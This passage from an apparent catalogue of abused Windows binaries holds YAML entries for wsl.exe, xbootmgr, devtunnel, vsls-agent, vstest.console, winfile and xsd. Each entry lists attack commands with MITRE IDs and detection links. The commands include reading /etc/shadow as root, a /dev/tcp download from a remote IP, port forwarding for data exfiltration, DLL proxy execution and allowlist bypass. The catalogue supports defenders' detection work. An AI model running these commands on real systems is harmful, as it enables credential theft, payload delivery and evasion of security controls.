Linux commands. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: EXE - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD - Command: wsl.exe --exec bash -c "{CMD}" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe Description: When executed, `wsl.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder. Usecase: Execute a payload as a child process of `bash.exe` while masquerading as WSL. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\wsl.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Child process from wsl.exe Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Link: https://twitter.com/nas_bench/status/1535431474429808642 - Link: https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/ Acknowledgement: - Person: Alex Ionescu Handle: '@aionescu' - Person: Matt Handle: '@NotoriousRebel1' - Person: Asif Matadar Handle: '@d1r4c' - Person: Nasreddine Bencherchali Handle: '@nas_bench' - Person: Konrad 'unrooted' Klawikowski - Person: Liran Ravich, CardinalOps ================================================ FILE: yml/OtherMSBinaries/XBootMgr.yml ================================================ --- Name: XBootMgr.exe Description: Windows Performance Toolkit binary used to start performance traces. Author: Avihay Eldad Created: 2025-07-10 Commands: - Command: xbootmgr.exe -trace "{boot|hibernate|standby|shutdown|rebootCycle}" -callBack {PATH:.exe} Description: Executes an executable after the trace is complete using the callBack parameter. Usecase: Executes code as part of post-trace automation flow. Category: Execute Privileges: Administrator MitreID: T1202 OperatingSystem: Windows Tags: - Execute: EXE - Command: xbootmgr.exe -trace "{boot|hibernate|standby|shutdown|rebootCycle}" -preTraceCmd {PATH:.exe} Description: Executes an executable before each trace run using the preTraceCmd parameter. Usecase: Executes code as part of pre-trace automation or staging. Category: Execute Privileges: Administrator MitreID: T1202 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Windows Kits\10\Windows Performance Toolkit\xbootmgr.exe - Path: C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\xbootmgr.exe Resources: - Link: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' - Person: Tommy Warren ================================================ FILE: yml/OtherMSBinaries/XBootMgrSleep.yml ================================================ --- Name: XBootMgrSleep.exe Description: Windows Performance Toolkit binary used for tracing and analyzing system performance during sleep and resume transitions. Author: Avihay Eldad Created: 2024-06-13 Commands: - Command: xbootmgrsleep.exe 1000 {PATH:.exe} Description: Execute executable via XBootMgrSleep, with a 1 second (=1000 milliseconds) delay. Alternatively, it is also possible to replace the delay with any string for immediate execution. Usecase: Performs execution of specified executable, can be used as a defense evasion Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Windows Kits\10\Windows Performance Toolkit\xbootmgrsleep.exe - Path: C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\xbootmgrsleep.exe Resources: - Link: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' - Person: Yuval Saban Handle: '@yuvalsaban3' ================================================ FILE: yml/OtherMSBinaries/devtunnels.yml ================================================ --- Name: devtunnel.exe Description: Binary to enable forwarded ports on windows operating systems. Author: Kamran Saifullah Created: 2023-09-16 Commands: - Command: devtunnel.exe host -p 8080 Description: Enabling a forwarded port for locally hosted service at port 8080 to be exposed on the internet. Usecase: Download Files, Upload Files, Data Exfiltration Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11, MacOS Full_Path: - Path: C:\Users\\AppData\Local\Temp\.net\devtunnel\devtunnel.exe - Path: C:\Users\\AppData\Local\Temp\DevTunnels\devtunnel.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml - IOC: devtunnel.exe binary spawned - IOC: '*.devtunnels.ms' - IOC: '*.*.devtunnels.ms' - Analysis: https://cydefops.com/vscode-data-exfiltration Resources: - Link: https://code.visualstudio.com/docs/editor/port-forwarding Acknowledgement: - Person: Kamran Saifullah Handle: '@deFr0ggy' ================================================ FILE: yml/OtherMSBinaries/vsls-agent.yml ================================================ --- Name: vsls-agent.exe Description: Agent for Visual Studio Live Share (Code Collaboration) Author: Jimmy (@bohops) Created: 2022-11-01 Commands: - Command: vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll} Description: Load a library payload using the --agentExtensionPath parameter (32-bit) Usecase: Execute proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed) Tags: - Execute: DLL Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml Resources: - Link: https://twitter.com/bohops/status/1583916360404729857 Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/vstest.console.yml ================================================ --- Name: vstest.console.exe Description: VSTest.Console.exe is the command-line tool to run tests Author: Onat Uzunyayla Created: 2023-09-08 Commands: - Command: vstest.console.exe {PATH:.dll} Description: VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general Usecase: Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe Code_Sample: - Code: https://github.com/onatuzunyayla/vstest-lolbin-example/ Detection: - IOC: vstest.console.exe spawning unexpected processes Resources: - Link: https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022 Acknowledgement: - Person: Onat Uzunyayla - Person: Ayberk Halac ================================================ FILE: yml/OtherMSBinaries/winfile.yml ================================================ --- Name: winfile.exe Description: Windows File Manager executable Author: Avihay Eldad Created: 2024-04-30 Commands: - Command: winfile.exe {PATH:.exe} Description: Execute an executable file with WinFile as a parent process. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\winfile.exe - Path: C:\Windows\winfile.exe - Path: C:\Program Files\WinFile\winfile.exe - Path: C:\Program Files (x86)\WinFile\winfile.exe - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe Resources: - Link: https://github.com/microsoft/winfile Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/xsd.yml ================================================ --- Name: xsd.exe Description: XML Schema Definition Tool included with the Windows Software Development Kit (SDK). Author: Avihay Eldad Created: 2024-04-09 Commands: - Command: xsd.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\bin\NETFX Tools\xsd.exe Detection: - IOC: URL on a xsd.exe command line - IOC: xsd.exe making unexpected network connections or DNS requests Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad'